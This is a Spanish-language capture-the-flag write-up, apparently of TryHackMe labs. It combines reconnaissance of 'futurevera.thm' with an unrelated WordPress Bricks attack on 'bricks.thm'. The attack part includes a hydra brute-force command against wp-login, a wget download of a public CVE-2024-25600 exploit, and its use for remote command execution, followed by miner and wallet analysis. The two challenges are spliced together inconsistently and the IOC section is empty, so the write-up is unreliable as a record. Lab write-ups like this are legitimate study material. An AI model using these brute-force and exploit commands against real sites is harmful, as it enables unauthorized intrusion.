🕵️ Introducción
Recientemente, hackerss contactaron a co-founders of futurevera.thm diciendo que podrían tomar el control y piden un gran rescate.
Herramientas y recursos externos utilizados
> [https:/](https://github.com/Chocapikk/CVE-2024-25600)root@ip-10-10-159-35:~/Desktop# echo "10.10.227.180 futurevera.thm" | sudo tee -a /etc/hosts
10.10.227.180 futurevera.thm
root@ip-10-10-159-35:~/Desktop# cat /etc/hosts
127.0.0.1 localhost
127.0.0.1 vnc.tryhackme.tech
127.0.1.1 tryhackme.lan tryhackme
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.227.180 futurevera.thm
🔍 1. Reconocimiento
root@ip-10-10-159-35:~/Desktop# sudo nmap -sCV -p- 10.10.227.180 -oN futurevera.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2025-05-14 02:39 BST
Nmap scan report for futurevera.thm (10.10.227.180)
Host is up (0.00019s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://futurevera.thm/
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: FutureVera
| ssl-cert: Subject: commonName=futurevera.thm/organizationName=Futurevera/stateOrProvinceName=Oregon/countryName=US
| Not valid before: 2022-03-13T10:05:19
|_Not valid after: 2023-03-13T10:05:19
| tls-alpn:
|_ http/1.1
MAC Address: 02:19:3D:5B:1C:3F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
🔢 2. Puertos abiertos y Enumeración de servicios
-
22/tcp – OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
-
80/tcp – http Apache httpd 2.4.41 ((Ubuntu))
http-server-header: Apache/2.4.41 (Ubuntu) http-title: Did not follow redirect to https://futurevera.thm/
-
443/tcp – ssl/http Apache httpd 2.4.41 ((Ubuntu))
http-server-header: Apache/2.4.41 (Ubuntu) http-title: FutureVera ssl-cert: Subject: commonName=futurevera.thm/organizationName=Futurevera/stateOrProvinceName=Oregon/countryName=US
MAC Address: 02:19:3D:5B:1C:3F (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeración de directorio
gobuster dir -u http://10.10.227.180 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Directorio encontrado
/server-status (Status: 403) [Size: 278]
Revise la version del servidor apache y parece ser vulnerable a un desbordamiento de búfer con esta CVE-2021-44790
Lance gobuster para encontar archivos .lua
gobuster dir -u https://futurevera.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x lua -k
===============================================================
/assets (Status: 301) [Size: 319] [--> https://futurevera.thm/assets/]
/css (Status: 301) [Size: 316] [--> https://futurevera.thm/css/]
/js (Status: 301) [Size: 315] [--> https://futurevera.thm/js/]
/server-status (Status: 403) [Size: 280]
Progress: 436550 / 436552 (100.00%)
buscamos en el /js algo util > solo la version de Bootstrap
Start Bootstrap - One Page Wonder v6.0.4 (https://startbootstrap.com/theme/one-page-wonder)
- Copyright 2013-2021 Start Bootstrap
🔎 3. Análisis e investigación
Enumeración de WordPress
Usando curl
y wpscan
, identificamos que el tema activo es Bricks.
Al buscar vulnerabilidades conocidas, encontramos el CVE:
- CVE-2024-25600: vulnerabilidad crítica que permite ejecución remota de comandos desde el editor del tema Bricks.
💣 4. Acceso inicial o administrativo
Tras enumerar el usuario administrator
, ejecutamos fuerza bruta con hydra
y obtenemos acceso:
hydra -l administrator -P rockyou.txt https://bricks.thm -s 443 -S -f \
http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:S=Location: /wp-admin/"
Se encontro un sobdominio support.futurevera.thm
DNS Name secrethelpdesk934752.support.futurevera.thm
🔓 5. Explotación
Usamos el exploit público para el CVE-2024-25600:
wget https://raw.githubusercontent.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT/main/CVE-2024-25600.py
Al ejecutarlo con credenciales válidas, logramos ejecutar comandos remotos y abrir una shell interactiva:
python3 CVE-2024-25600.py --url https://bricks.thm --username administrator --password ***** --cmd id
🐚 6. Post-explotación
Accedemos a /var/www/html/
y encontramos la flag inicial:
THM{fl46_650c844110baced87e1606453b93f22a}
🔍 7. Proceso y servicio sospechoso
Revisamos los procesos activos y servicios del sistema, encontrando uno sospechoso:
ubuntu.service - TRYHACK3M
ExecStart=/lib/NetworkManager/nm-inet-dialog
El proceso asociado es: nm-inet-dialog
.
📁 Análisis del miner
Identificamos el archivo de log del minero en:
/lib/NetworkManager/inet.conf
Este archivo contiene líneas como:
[*] Bitcoin Miner Thread Started
Y una clave codificada como:
ID: WW1NeGNY...
🔓 Decodificación de wallet
Decodificando el valor de ID
en base64 (tres veces), obtenemos:
bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa
Una dirección de Bitcoin válida (Bech32) usada para recibir ganancias del minero.
🕵️♂️ 8. Asociación con grupo de amenazas
Rastreando la dirección en fuentes OSINT, encontramos que ha sido usada en transacciones ligadas al grupo de ransomware LockBit.
🧠 9. IOCs (Indicators of Compromise)
IPs, hashes, URLs, etc.
📝 10. Conclusión
Este reto combina:
- Enumeración de WordPress
- Explotación real de CVE
- Escalada post-explotación
- Análisis forense y OSINT